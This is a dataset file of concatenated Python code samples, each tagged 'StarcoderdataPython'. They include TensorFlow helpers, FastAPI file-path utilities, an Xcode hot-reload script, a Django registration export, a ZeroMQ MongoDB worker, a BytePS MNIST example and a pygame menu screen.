        # entry in mask[b].
        index = tf.reshape(tf.range(batch_size),[batch_size,1])*tf.ones_like(mask,dtype=tf.int32)
        index = tf.boolean_mask(index,mask)
        return tf.gather(image,index)
def sort_data(key,datas):
    # Sort every tensor in `datas` by descending `key` (top_k with k = full
    # length returns all elements sorted high-to-low).
    # Returns ([sorted_keys, permutation], sorted_datas).
    size = tf.shape(key)[0]
    values,indices = tf.nn.top_k(key,k=size)
    datas = [tf.gather(x,indices) for x in datas]
    return [values,indices],datas
def get_pad_shapes_for_padded_batch(dataset):
    """Return {feature_name: shape_as_list} for every entry of the dataset's
    output_shapes, suitable for passing to padded_batch."""
    return {name: shape.as_list() for name, shape in dataset.output_shapes.items()}
def show_graph_info(graph=None):
    # Print total FLOPs and trainable-parameter count of `graph`
    # (the default graph when None) using the TF1 profiler.
    flops = tf.profiler.profile(graph, options=tf.profiler.ProfileOptionBuilder.float_operation())
    params = tf.profiler.profile(graph, options=tf.profiler.ProfileOptionBuilder.trainable_variables_parameter())
    print('FLOPs: {}; Trainable params: {}'.format(flops.total_float_ops, params.total_parameters))
def concat_with_length(datas, lengths, axis=0):
    """Truncate each tensor to its valid length along *axis*, then concat.

    :param datas: sequence of tensors sharing all dims except *axis*
    :param lengths: lengths[i] = number of valid entries of datas[i] on *axis*
    :param axis: 0, 1 or -1, the axis to truncate and concatenate along
    :return: one tensor, the concatenation of the truncated inputs
    :raises NotImplementedError: for any other axis value
    """
    real_datas = []
    for i, d in enumerate(datas):
        if axis == 0:
            d = d[:lengths[i]]
        elif axis == 1:
            # Fix: slice up to lengths[i]. The original `d[:, lengths[i]]`
            # indexed a single element, dropping a dimension and breaking
            # the final concat.
            d = d[:, :lengths[i]]
        elif axis == -1:
            # Same fix as axis == 1 for the trailing axis.
            d = d[..., :lengths[i]]
        else:
            raise NotImplementedError(
                "concat_with_length only supports axis 0, 1 or -1, got %r" % (axis,))
        real_datas.append(d)
    return tf.concat(real_datas, axis=axis)
def batch_concat_with_length(datas,lengths,axis=1):
    # Concatenate padded, variable-length batches along axis 1, compacting
    # the valid entries of every batch row to the front and re-padding.
    # datas[i]: [N, X_i, ...]; lengths[i]: [N] valid counts per row.
    # Returns (merged data [N, sum(X_i), ...] left-compacted, new lengths [N]).
    if axis != 1:
        raise NotImplementedError("Error")
    masks = []
    for i,t_len in enumerate(lengths):
        maxlen = combined_static_and_dynamic_shape(datas[i])[1]
        masks.append(tf.sequence_mask(t_len, maxlen=maxlen))
    masks = tf.concat(masks,axis=1)
    datas = tf.concat(datas,axis=axis)
    max_len = combined_static_and_dynamic_shape(masks)[1]
    def fn(data,mask):
        # Compact one row: keep valid entries, pad the tail back to max_len.
        data = tf.boolean_mask(data,mask)
        cur_len = combined_static_and_dynamic_shape(data)[0]
        paddings = [[0,max_len-cur_len]]
        if len(data.get_shape())>1:
            paddings += [[0,0]]*(len(data.get_shape())-1)
        data = tf.pad(data,paddings=paddings)
        length = tf.reduce_sum(tf.cast(mask,tf.int32))
        return data,length
    datas,lengths = tf.map_fn(lambda x:fn(x[0],x[1]),elems=(datas,masks),dtype=(datas[0].dtype,tf.int32))
    return datas,lengths
if __name__ == "__main__":
wmlu.show_list(get_variables_in_ckpt_in_dir("../../mldata/faster_rcnn_resnet101/"))
| StarcoderdataPython |
6639556 | import os
import posixpath
from enum import Enum
from fastapi import Path, HTTPException
from utils import security
class UploadPath(str, Enum):
    # Known upload roots; enum values double as API path parameters.
    default = "default"
# Maps each UploadPath member to its on-disk root directory.
UPLOAD_PATH_DICT = {
    UploadPath.default: "default/"
}
def get_upload(upload_key: UploadPath = Path(..., description="上传文件块位置")):
    """
    Return a resolver for the upload directory selected by *upload_key*.

    :param upload_key: key into UPLOAD_PATH_DICT choosing the upload root
    :return: func(folder) -> absolute path of the (created) upload folder
    """
    root_path = posixpath.abspath(UPLOAD_PATH_DICT[upload_key])
    def func(folder):
        # safe_join guards against path traversal outside root_path.
        path = security.safe_join(root_path, folder)
        os.makedirs(path, exist_ok=True)
        return path
    return func
class DownloadPath(str, Enum):
    # Known download roots; enum values double as API path parameters.
    default = "default"
# Maps each DownloadPath member to its on-disk root directory.
DOWNLOAD_PATH_DICT = {
    DownloadPath.default: "default/"
}
def get_download(download_key: DownloadPath = Path(..., description="下载文件块位置")):
    """
    Return a resolver for the download directory selected by *download_key*.

    :param download_key: key into DOWNLOAD_PATH_DICT choosing the download root
    :return: func(folder) -> (file_path, filename) of the first file found in
             the folder; raises HTTPException(404) when folder or file is missing
    """
    root_path = posixpath.abspath(DOWNLOAD_PATH_DICT[download_key])

    def func(folder):
        # safe_join guards against path traversal outside root_path.
        path = security.safe_join(root_path, folder)
        if not posixpath.exists(path):
            raise HTTPException(404, "The access file does not exist")
        for filename in os.listdir(path):
            return posixpath.join(path, filename), filename
        # Fix: an existing but empty folder previously fell off the end of
        # the loop and returned None; report it as a missing file instead.
        raise HTTPException(404, "The access file does not exist")
    return func
| StarcoderdataPython |
5064406 | <filename>hammer.py
import glob
import gzip
import os
import shutil
from subprocess import Popen, PIPE
destination_directory = None
"""
Tools
"""
class colors:
    """ANSI escape sequences used to colorize terminal log output."""
    DEBUG = '\033[92m'
    WARNING = '\033[93m'
    ERROR = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'

def debug_log(logstring):
    """Print *logstring* after a green "Hammer:DEBUG:" prefix."""
    print(f"{colors.DEBUG}Hammer:DEBUG: {colors.ENDC}{logstring}")

def warning_log(logstring):
    """Print *logstring*, fully yellow, after a "Hammer:WARNING:" prefix."""
    print(f"{colors.WARNING}Hammer:WARNING: {logstring}{colors.ENDC}")

def error_log(logstring):
    """Print *logstring*, fully red, after a "Hammer:ERROR:" prefix."""
    print(f"{colors.ERROR}Hammer:ERROR: {logstring}{colors.ENDC}")
def run_script(script, args):
    # Run an AppleScript source string through /usr/bin/osascript, passing
    # `args` as script arguments, and return its trimmed stdout.
    # NOTE(review): communicate(script) and stdout.strip() assume str/bytes
    # compatibility (Python 2 style); on Python 3 `script` must be bytes and
    # the return value is bytes — confirm against the callers.
    p = Popen(['/usr/bin/osascript', '-'] + args, stdin=PIPE, stdout=PIPE, stderr = PIPE)
    stdout, stderr = p.communicate(script)
    return stdout.strip()
def newest_directory_in_path(path):
    """Return the most recently modified immediate subdirectory of *path*.

    :param path: directory to scan (non-recursive)
    :return: full path of the subdirectory with the newest mtime, or None
             when *path* contains no subdirectories
    """
    subdirs = [os.path.join(path, d) for d in os.listdir(path)
               if os.path.isdir(os.path.join(path, d))]
    if not subdirs:
        return None
    # max() with a key replaces the original manual latest/latest_time
    # bookkeeping (which also carried a dead `continue`).
    return max(subdirs, key=os.path.getmtime)
"""
"""
def get_edited_file_name():
    """
    Gets the current open file in xcode.

    Asks Xcode (via AppleScript) for the path of the document whose name
    matches the frontmost window title; returns the path, or an empty
    string when Xcode has no matching open document.
    """
    script = '''
    tell application "Xcode"
        set last_word_in_main_window to (word -1 of (get name of window 1))
        set current_document to document 1 whose name ends with last_word_in_main_window
        set current_document_path to path of current_document
        return current_document_path
    end tell
    '''
    val = run_script(script, [])
    if len(val) > 0:
        debug_log("Currently editing " + val + " in Xcode, we'll try to use that.")
    else:
        error_log("Failed to get current edited document in Xcode! Is Xcode running, and is a source file open?")
    return val
def get_last_output_version(class_name):
    """Return the next free version number for *class_name* builds.

    Scans the module-level `destination_directory` for files named
    "<class_name>-<version>.<ext>" and returns max(version) + 1
    (1 when no matching file exists).
    """
    version_num = 0
    for filename in os.listdir(destination_directory):
        if not filename.startswith(class_name):
            continue
        tokens = filename.split("-")
        if len(tokens) == 2 and tokens[0] == class_name:
            # Fix: track the maximum version seen. The original kept the
            # *last listed* version, but os.listdir order is arbitrary, so
            # it could return an already-used number.
            version_num = max(version_num, int(tokens[1].split(".")[0]))
    return version_num + 1
def compile_edited_file(path_to_file):
    """
    Recompile *path_to_file* as a dynamic library, reusing the compile
    command recorded in the latest Xcode build log.

    Returns the path to the produced (and codesigned) dylib.
    """
    if (len(path_to_file) > 0):
        debug_log("Trying to compile " + path_to_file)
    else:
        error_log("Nothing to compile!")
    derived_data_path = newest_directory_in_path(os.path.expanduser(os.path.join('~', 'Library', 'Developer', 'Xcode', 'DerivedData')))
    logs_path = os.path.join(derived_data_path, 'Logs', 'Build', '*.xcactivitylog')
    # Fix: pick the NEWEST build log. The original used min(), which selects
    # the oldest log despite the variable name and the docstring.
    newest_log = max(glob.iglob(logs_path), key=os.path.getctime)
    # the logfile is gzipped
    compile_commands = []
    dylib_output = None
    with gzip.open(newest_log, 'r') as f:
        line = f.read()
        # just one line: locate the recorded clang invocation for this file
        path_to_file = path_to_file.replace(" ", "\ ")
        index_of_path = line.rfind(path_to_file)
        left_index = line[:index_of_path].rfind("\r")
        right_index = line[index_of_path:].find("\r")
        raw_command = line[left_index:index_of_path+right_index]
        # Compile as a dylib instead of an object file.
        raw_command = raw_command.replace('-c ' + path_to_file, '-dynamiclib ' + path_to_file)
        # change the output filename to ClassName-<version>.dylib
        path_component, file_component = os.path.split(path_to_file)
        class_name = file_component.replace(".m", "")
        file_component = file_component.replace('.m', '.o')
        left_index = raw_command.find('-o ') + 3
        right_index = raw_command.find(file_component) + len(file_component)
        orig_output = raw_command[left_index:right_index]
        version_num = get_last_output_version(class_name)
        dylib_output = orig_output.replace(file_component, file_component.replace('.o', '-' + str(version_num) + '.dylib'))
        raw_command = raw_command.replace(orig_output, dylib_output)
        # skip missing symbols; they should be in the app too
        raw_command = raw_command + ' -undefined dynamic_lookup'
        raw_command = raw_command + ' -current_version ' + '1.0'
        compile_commands.append(raw_command.strip())
        # Ad-hoc codesign so the simulator will load the library.
        compile_commands.append('codesign --force -s "-" ' + dylib_output)
    for command in compile_commands:
        debug_log("Executing compile commands")
        debug_log(command)
        os.system(command)
    return dylib_output
def get_last_used_simulator_application_documents_path():
    """
    Gets the path to the Documents directory of the last used simulator application.

    Picks the most recently modified simulator device, then the most
    recently modified application data container inside it.
    """
    core_path = os.path.expanduser(os.path.join('~', 'Library', 'Developer', 'CoreSimulator', 'Devices'))
    simulator_app_data_path = os.path.join(newest_directory_in_path(core_path), 'data', 'Containers', 'Data', 'Application')
    return os.path.join(newest_directory_in_path(simulator_app_data_path), 'Documents')
# Script body: compile the file currently open in Xcode into a dylib and
# install it into the most recently used simulator app's Documents/hammer.
destination_directory = os.path.join(get_last_used_simulator_application_documents_path(), 'hammer')
# get the edited file
# compile it as a dynamic library
path_to_dylib = compile_edited_file(get_edited_file_name())
# move it to the simulator documents directory
try:
    # create the destination, if needed
    os.makedirs(destination_directory)
except IOError as e:
    debug_log(e.strerror)
except:
    # NOTE(review): bare except silently ignores "directory exists" (and
    # everything else) — best-effort by design, kept as-is.
    pass
path_component, file_component = os.path.split(path_to_dylib)
debug_log("Moving new code into " + destination_directory)
new_path = os.path.join(destination_directory, file_component)
try:
    # delete if exists
    os.unlink(new_path)
except:
    pass
try:
    shutil.move(path_to_dylib, new_path)
except IOError as e:
    error_log("Error while installing code into simulator.")
    error_log(e.strerror)
except:
    pass
debug_log("...done.")
# profit
3255872 | #!/usr/bin/python3
import sys
import os
import mod_path
import template
from headers import *
print_headers()
navbar = template.get("navbar")
print(template.get('contacts').format(**locals())) | StarcoderdataPython |
261150 | <filename>huxley/core/admin/registration.py
# Copyright (c) 2011-2021 Berkeley Model United Nations. All rights reserved.
# Use of this source code is governed by a BSD License (see LICENSE).
import csv
from django.conf import settings
from django.conf.urls import url
from django.contrib import admin
from django.urls import reverse
from django.http import HttpResponse, HttpResponseRedirect
from googleapiclient.discovery import build
from google.oauth2 import service_account
from huxley.core.models import Registration
class RegistrationAdmin(admin.ModelAdmin):
    """Admin for Registration: adds a CSV export (`info`) and a Google
    Sheets sync (`sheets`) on top of the standard change list."""

    def get_rows(self):
        """Build spreadsheet rows: one header row followed by one row per
        registration, ordered by school name."""
        rows = []
        rows.append([
            "Registration Time", "School Name", "Total Number of Delegates",
            "Beginners", "Intermediates", "Advanced", "Spanish Speakers",
            "Chinese Speakers", "Assignments Finalized", "Waivers Complete",
            "Delegate Fees Paid", "Delegate Fees Owed",
            "Paid Registration Fee?", "Country 1", "Country 2", "Country 3",
            "Country 4", "Country 5", "Country 6", "Country 7", "Country 8",
            "Country 9", "Country 10", "Committee Preferences",
            "Registration Comments"
        ])
        for registration in Registration.objects.all().order_by(
                'school__name'):
            country_preferences = [
                str(cp)
                for cp in registration.country_preferences.all().order_by(
                    'countrypreference')
            ]
            # Pad to exactly 10 columns so every row lines up with the header.
            country_preferences += [''] * (10 - len(country_preferences))
            committee_preferences = [
                ', '.join(cp.name
                          for cp in registration.committee_preferences.all())
            ]
            rows.append([
                str(field) for field in [
                    registration.registered_at, registration.school.name,
                    registration.num_beginner_delegates +
                    registration.num_intermediate_delegates +
                    registration.num_advanced_delegates,
                    registration.num_beginner_delegates,
                    registration.num_intermediate_delegates,
                    registration.num_advanced_delegates,
                    registration.num_spanish_speaking_delegates,
                    registration.num_chinese_speaking_delegates, registration.
                    assignments_finalized, registration.waivers_completed,
                    registration.delegate_fees_paid, registration.
                    delegate_fees_owed, registration.registration_fee_paid
                ]
            ] + country_preferences + committee_preferences +
                [str(registration.registration_comments)])
        return rows

    def info(self, request):
        '''Returns a CSV file of all the registration information.'''
        registrations = HttpResponse(content_type='text/csv')
        registrations[
            'Content-Disposition'] = 'attachment; filename="registration_info.csv"'
        writer = csv.writer(registrations)
        for row in self.get_rows():
            writer.writerow(row)
        return registrations

    def sheets(self, request):
        """Replace the configured Google Sheet's contents with the current
        registration rows, then redirect back to the change list.
        No-op (redirect only) when settings.SHEET_ID is unset."""
        if settings.SHEET_ID:
            SHEET_RANGE = 'Registration!A1:Y'
            # Store credentials
            creds = service_account.Credentials.from_service_account_file(
                settings.SERVICE_ACCOUNT_FILE, scopes=settings.SCOPES)
            data = self.get_rows()
            body = {
                'values': data,
            }
            service = build('sheets', 'v4', credentials=creds)
            # Clear the old contents before writing the fresh snapshot.
            response = service.spreadsheets().values().clear(
                spreadsheetId=settings.SHEET_ID,
                range=SHEET_RANGE,
            ).execute()
            response = service.spreadsheets().values().update(
                spreadsheetId=settings.SHEET_ID,
                range=SHEET_RANGE,
                valueInputOption='USER_ENTERED',
                body=body).execute()
        return HttpResponseRedirect(
            reverse('admin:core_registration_changelist'))

    def get_urls(self):
        # Expose the two extra admin views under the model's admin URLs.
        return super(RegistrationAdmin, self).get_urls() + [
            url(
                r'info',
                self.admin_site.admin_view(self.info),
                name='core_registration_info',
            ),
            url(
                r'sheets',
                self.admin_site.admin_view(self.sheets),
                name='core_registration_sheets',
            ),
        ]
| StarcoderdataPython |
399285 | <reponame>rinceyuan/WeFe
# Copyright 2021 <NAME>. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
from common.python.utils import log_utils
from kernel.utils import consts
LOGGER = log_utils.get_logger()
class BaseCrossValidator(object):
    """Base class for cross-validation splitters.

    Subclasses implement `split`; `display_cv_result` aggregates and logs
    per-fold evaluation metrics."""

    def __init__(self):
        # Federated execution mode (e.g. consts.HORZ) — set by subclass/caller.
        self.mode = None
        # Party role (consts.PROMOTER / consts.PROVIDER) — set by subclass/caller.
        self.role = None

    def split(self, data_inst):
        # To be implemented by subclasses: yield train/test splits of data_inst.
        pass

    def display_cv_result(self, cv_results):
        """Log mean/std of every metric across folds.

        cv_results: list (one entry per fold) of {metric_name: value} dicts,
        where a value is either a scalar or a list of (threshold, value) pairs.
        Only logged by the promoter, or by the provider in horizontal mode.
        """
        LOGGER.debug("cv_result: {}".format(cv_results))
        if self.role == consts.PROMOTER or (self.role == consts.PROVIDER and self.mode == consts.HORZ):
            format_cv_result = {}
            for eval_result in cv_results:
                for eval_name, eval_r in eval_result.items():
                    if not isinstance(eval_r, list):
                        if eval_name not in format_cv_result:
                            format_cv_result[eval_name] = []
                        format_cv_result[eval_name].append(eval_r)
                    else:
                        # Thresholded metrics: one aggregate per threshold,
                        # keyed as "<metric>_thres_<threshold>".
                        for e_r in eval_r:
                            e_name = "{}_thres_{}".format(eval_name, e_r[0])
                            if e_name not in format_cv_result:
                                format_cv_result[e_name] = []
                            format_cv_result[e_name].append(e_r[1])
            for eval_name, eva_result_list in format_cv_result.items():
                mean_value = np.around(np.mean(eva_result_list), 4)
                std_value = np.around(np.std(eva_result_list), 4)
                LOGGER.info("{},evaluate name: {}, mean: {}, std: {}".format(self.role,
                                                                             eval_name, mean_value, std_value))
11252771 | <filename>rabidmongoose/worker.py<gh_stars>0
'''
rabid.mongoose worker
follows the Paranoid Pirate Pattern from ZeroMQ
'''
from random import randint
import time
import zmq
from rabidmongoose.handlers import MongoHandler
from rabidmongoose.config import MONGOR, TIMEOUT, FLUENT, LOGTAG, \
HEARTBEAT_LIVENESS, HEARTBEAT_INTERVAL, \
INTERVAL_INIT, INTERVAL_MAX, \
PPP_READY, PPP_HEARTBEAT
from StringIO import StringIO
import logging
from uuid import uuid4
try:
from ujson import loads
except ImportError:
from json import loads
FORMAT = '%(asctime)s %(levelname)-8s %(message)s'
logging.basicConfig(level=logging.DEBUG, format=FORMAT)
LOGGER = logging.getLogger(__name__)
try:
from fluent.handler import FluentHandler
LOGGER.addHandler(FluentHandler("%s.debug" %(LOGTAG),
host=FLUENT.split(":")[0],
port=int(FLUENT.split(":")[1])))
except ImportError:
pass #oh well, stdout is ok
class MongooseHandler:
    """Adapter that routes worker job requests to a MongoHandler method
    and captures the handler's streamed JSON output."""

    def __init__(self, name=None):
        # Worker identity (random UUID when not given).
        self.name = name or str(uuid4())
        self.mongo_handler = MongoHandler(MONGOR,
                                          cursor_timeout = TIMEOUT,
                                          fluentd = FLUENT,
                                          logtag = LOGTAG)
        # Cursor IDs seen so far. NOTE(review): never updated in this class —
        # confirm whether callers are expected to maintain it.
        self.cursors = set()

    def close(self):
        # No resources to release here; MongoHandler owns the connection.
        return

    def handle_request(self, args, func_name, db_type, collection):
        """Invoke MongoHandler.<func_name>(args, ...) and return
        (json_response_string, currently_open_cursor_ids)."""
        response_content = StringIO()
        out = response_content.write
        func = getattr(self.mongo_handler, func_name, None)
        LOGGER.debug({"debug":"sending to %s" %(func_name)})
        if callable(func):
            func(args, out,
                 name = "", #TODO: remove this, around since sleepy.mongoose
                 db = db_type,
                 collection = collection)
        else:
            # Unknown handler method: answer with a JSON error document.
            out('{"ok" : 0, "errmsg" : "%s not callable"}' %(func_name))
        current_cursors = set(self.mongo_handler.available_cursors())
        return response_content.getvalue(), current_cursors
def worker_socket(context, poller):
    """Helper function that returns a new configured socket
    connected to the Paranoid Pirate queue.

    Creates a DEALER socket with a random printable identity, registers it
    with `poller`, connects to the local queue and announces readiness with
    a PPP_READY frame."""
    worker = context.socket(zmq.DEALER) # DEALER
    identity = "%04X-%04X" % (randint(0, 0x10000), randint(0, 0x10000))
    worker.setsockopt(zmq.IDENTITY, identity)
    poller.register(worker, zmq.POLLIN)
    worker.connect("tcp://localhost:8586")
    worker.send(PPP_READY)
    return worker
def handle_request(request_data):
    """Decode one JSON job request and dispatch it to the module-level
    MongooseHandler (MH), returning a JSON response string.

    Expected request keys: 'args', 'func_name', 'db', 'collection'.
    Malformed requests are answered with a JSON error document instead of
    raising, so the worker loop keeps running.
    """
    LOGGER.debug({"debug":"got request %s" %(request_data)})
    try:
        job_data = loads(request_data)
        (resp, cursors) = MH.handle_request(job_data['args'],
                                            job_data['func_name'],
                                            job_data['db'],
                                            job_data['collection'])
    except ValueError:
        resp = '{"ok" : 0, "errmsg" : "cannot parse input JSON"}'
    except KeyError:
        resp = '{"ok" : 0, "errmsg" : "required keys not provided"}'
    except Exception:
        # Fix: the original bare "except:" also swallowed SystemExit and
        # KeyboardInterrupt, making the worker impossible to stop cleanly.
        resp = '{"ok" : 0, "errmsg" : "Unknown error in request worker"}'
    return resp
def start():
    """Run the Paranoid Pirate worker loop: answer requests from the queue,
    exchange heartbeats, and reconnect with exponential backoff when the
    queue goes silent."""
    global MH
    MH = MongooseHandler()
    context = zmq.Context(1)
    poller = zmq.Poller()
    liveness = HEARTBEAT_LIVENESS   # missed-heartbeat budget before reconnect
    interval = INTERVAL_INIT        # current reconnect backoff (seconds)
    heartbeat_at = time.time() + HEARTBEAT_INTERVAL
    worker = worker_socket(context, poller)
    while True:
        socks = dict(poller.poll(HEARTBEAT_INTERVAL * 1000))
        # Handle worker activity on backend
        if socks.get(worker) == zmq.POLLIN:
            # Get message
            # - 3-part envelope + content -> request
            # - 1-part HEARTBEAT -> heartbeat
            frames = worker.recv_multipart()
            if not frames:
                break # Interrupted
            if len(frames) == 3:
                # Replace the payload frame with the response, echo envelope.
                frames[2] = handle_request(frames[2])
                worker.send_multipart(frames)
                liveness = HEARTBEAT_LIVENESS
            elif len(frames) == 1 and frames[0] == PPP_HEARTBEAT:
                liveness = HEARTBEAT_LIVENESS
            else:
                LOGGER.error( {"errmsg": "Invalid message: %s" % frames })
            # Any traffic from the queue resets the reconnect backoff.
            interval = INTERVAL_INIT
        else:
            liveness -= 1
            if liveness == 0:
                # Queue presumed dead: back off, then rebuild the socket.
                LOGGER.error({"errmsg": "Heartbeat failure",
                              "reconnect": "Reconnect in %0.2fs" % interval})
                time.sleep(interval)
                if interval < INTERVAL_MAX:
                    interval *= 2
                poller.unregister(worker)
                worker.setsockopt(zmq.LINGER, 0)
                worker.close()
                worker = worker_socket(context, poller)
                liveness = HEARTBEAT_LIVENESS
        if time.time() > heartbeat_at:
            heartbeat_at = time.time() + HEARTBEAT_INTERVAL
            worker.send(PPP_HEARTBEAT)
if __name__ == "__main__":
start() | StarcoderdataPython |
6420759 | from thicket import files
def test_import():
    # Smoke test: the module imported at the top of this file is truthy,
    # proving the package is importable.
    assert files
| StarcoderdataPython |
3542027 | """
85 / 85 test cases passed.
Runtime: 156 ms
Memory Usage: 15.7 MB
"""
class Solution:
    """LeetCode 944: given equal-length strings, count the columns that are
    not sorted in non-decreasing order (i.e. must be deleted)."""

    def minDeletionSize(self, strs: List[str]) -> int:
        # A column must be deleted iff some adjacent pair in it is strictly
        # decreasing; zip(*strs) iterates the columns directly.
        return sum(
            1
            for column in zip(*strs)
            if any(upper > lower for upper, lower in zip(column, column[1:]))
        )
| StarcoderdataPython |
4955893 | <reponame>ChrisQiqiang/allocation<filename>example/tensorflow/tensorflow2_mnist_bps_MirroredStrategy.py<gh_stars>1000+
import tensorflow as tf
import numpy as np
import json
import os
import sys
import argparse
import byteps.tensorflow as bps
from byteps.tensorflow.distribute import MirroredStrategy
parser = argparse.ArgumentParser(description='TensorFlow Synthetic Benchmark',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--rank', default=-1, type=int,
help='node rank for distributed training')
args = parser.parse_args()
tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.INFO)
bps.init()
args.rank = bps.local_rank()
print("my rank ", args.rank)
gpus = tf.config.experimental.list_physical_devices('GPU')
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
if gpus:
tf.config.experimental.set_visible_devices(gpus[bps.local_rank()], 'GPU')
def mnist_dataset(batch_size):
    # Build an infinitely repeating, shuffled MNIST training pipeline
    # batched to `batch_size` (the global batch size across workers).
    (x_train, y_train), _ = tf.keras.datasets.mnist.load_data()
    # The `x` arrays are in uint8 and have values in the range [0, 255].
    # We need to convert them to float32 with values in the range [0, 1]
    x_train = x_train / np.float32(255)
    y_train = y_train.astype(np.int64)
    train_dataset = tf.data.Dataset.from_tensor_slices(
        (x_train, y_train)).shuffle(60000).repeat().batch(batch_size)
    return train_dataset
def build_and_compile_cnn_model():
    # Small CNN for MNIST: Conv2D(32) -> Flatten -> Dense(128) -> logits(10),
    # compiled with SGD and sparse categorical cross-entropy (from logits).
    model = tf.keras.Sequential([
        tf.keras.Input(shape=(28, 28)),
        tf.keras.layers.Reshape(target_shape=(28, 28, 1)),
        tf.keras.layers.Conv2D(32, 3, activation='relu'),
        tf.keras.layers.Flatten(),
        tf.keras.layers.Dense(128, activation='relu'),
        tf.keras.layers.Dense(10)
    ])
    model.compile(
        loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),
        optimizer=tf.keras.optimizers.SGD(learning_rate=0.001),
        metrics=['accuracy'])
    return model
per_worker_batch_size = 64
strategy = MirroredStrategy(devices=["/gpu:0"])
num_workers = 1
per_worker_batch_size = 64
# Here the batch size scales up by number of workers since
# `tf.data.Dataset.batch` expects the global batch size. Previously we used 64,
# and now this becomes 128.
global_batch_size = per_worker_batch_size * num_workers
multi_worker_dataset = mnist_dataset(global_batch_size)
with strategy.scope():
# Model building/compiling need to be within `strategy.scope()`.
multi_worker_model = build_and_compile_cnn_model()
# Keras' `model.fit()` trains the model with specified number of epochs and
# number of steps per epoch. Note that the numbers here are for demonstration
# purposes only and may not sufficiently produce a model with good quality.
multi_worker_model.fit(multi_worker_dataset, epochs=100, steps_per_epoch=70)
| StarcoderdataPython |
9694366 | <gh_stars>1-10
import os
import pygame
from pygame.locals import *
from definitions import MAPS_DIR
from game_state_machine.GameState import GameState
from utils import sound_path
class MapSelection(GameState):
    """Game state for the map-selection screen: four numbered map buttons
    plus a Menu button, selectable by mouse click or keyboard (1-4 / M)."""

    def __init__(self):
        super().__init__()
        self.button_size = 50, 30
        # Colors used by the MapSelection buttons
        self.button_color = pygame.Color("yellow")
        self.color_when_clicked = pygame.Color("white")
        r = Rect((0, 0), self.button_size)
        r.center = self.get_screen_rect().center
        K = 50  # NOTE(review): unused local — confirm before removing
        # Label and rect of each button (offsets from the screen center)
        self.buttons = [
            {'name': 'menu', 'msg': 'Menu', 'pos': r.move(0, 0)},
            {'name': 'quadra', 'msg': '1', 'pos': r.move(-180, 88)},  # the C-building court
            {'name': 'hall', 'msg': '2', 'pos': r.move(40, -175)},  # the A-building hall
            {'name': 'apart', 'msg': '3', 'pos': r.move(100, 170)},  # the C- apartment
            {'name': 'feijao', 'msg': '4', 'pos': r.move(-168, -115)},  # the "feijao" map
        ]
        # (rect, button) pairs for hit-testing.
        self.rects = [(b['pos'], b) for b in self.buttons]
        self.select_sound = pygame.mixer.Sound(sound_path('select.ogg'))
        self.enter_sound = pygame.mixer.Sound(sound_path('enter.ogg'))
        # True while the mouse is hovering over any button.
        self.hover = False

    def startup(self):
        # No per-entry setup needed for this screen.
        pass

    def cleanup(self):
        pass

    def update(self):
        pass

    def draw(self, surface):
        """Draw the background map, every button and the hint line."""
        # surface.fill(background_color)
        bg = pygame.image.load(os.path.join(MAPS_DIR, 'h8_square_bare.png'))
        surface.blit(bg, (0, 0))
        for b in self.buttons:
            self.draw_button(surface, b)
        self.text = "Press/Click 1-4 to play or 'M' to go to Menu"
        f2 = self.fonts['h3']
        text_ = f2.render(self.text, True, pygame.Color("yellow"), 'black')
        r = Rect((0, 0), (0, 0))
        r.centerx = self.get_screen_rect().centerx
        r.move_ip(-130, 490)
        surface.blit(text_, r.topleft)

    def draw_button(self, surface, button_info):
        """Draw one button, highlighted while the mouse hovers over it."""
        # NOTE(review): name/size/click are computed but unused here.
        name = button_info['name']
        pos = button_info['pos']
        msg = button_info['msg']
        size = self.button_size
        mouse = pygame.mouse.get_pos()
        click = pygame.mouse.get_pressed(num_buttons=3)
        rect = pos
        inside = rect.collidepoint(mouse)
        color = self.color_when_clicked if inside else self.button_color
        pygame.draw.rect(surface, color, rect)
        # draw the label text centered on the button
        small_text = self.fonts['h2']  # fixme: h2 or m?
        text_surf, text_rect = self.text_objects(msg, small_text)
        text_rect.center = rect.center
        surface.blit(text_surf, text_rect)

    def on_key_up(self, e):
        """Keyboard shortcuts: 1-4 (top row or keypad) starts the matching
        map; M returns to the menu."""
        if K_1 <= e.key <= K_4 or K_KP1 <= e.key <= K_KP4:
            if K_1 <= e.key <= K_4:
                selected = str(e.key - K_1 + 1)
            elif K_KP1 <= e.key <= K_KP4:
                selected = str(e.key - K_KP1 + 1)
            button = next(b for b in self.buttons if b['msg'] == selected)
            self.enter_sound.play()
            self.next_state = self.get_gameplay_state(button)
            self.done = True
        elif e.key == K_m:
            self.next_state = 'Menu'
            self.enter_sound.play()
            self.done = True

    def on_mouse_up(self, e):
        # Left-button release over a button triggers its transition.
        if e.button == 1:
            collided, next_state = self.get_collisions(e.pos)
            if collided:
                self.enter_sound.play()
                self.next_state = next_state
                self.done = True

    def get_collisions(self, pos):
        """Return (True, next_state_name) for the first button under *pos*,
        or (False, None) when nothing was hit."""
        collided, msg = False, ''
        for r, button in self.rects:
            if r.collidepoint(pos):
                msg = button['msg']
                # Numeric labels map to gameplay states; others ("Menu")
                # are state names themselves.
                if msg.isnumeric():
                    next_state = self.get_gameplay_state(button)
                else:
                    next_state = msg
                return True, next_state
        return False, None

    def get_event(self, event):
        # Play the select sound once when the pointer first enters a button.
        if event.type == pygame.MOUSEMOTION:
            previous = self.hover
            self.hover = False
            for rect, button in self.rects:
                if rect.collidepoint(event.pos):
                    self.hover = True
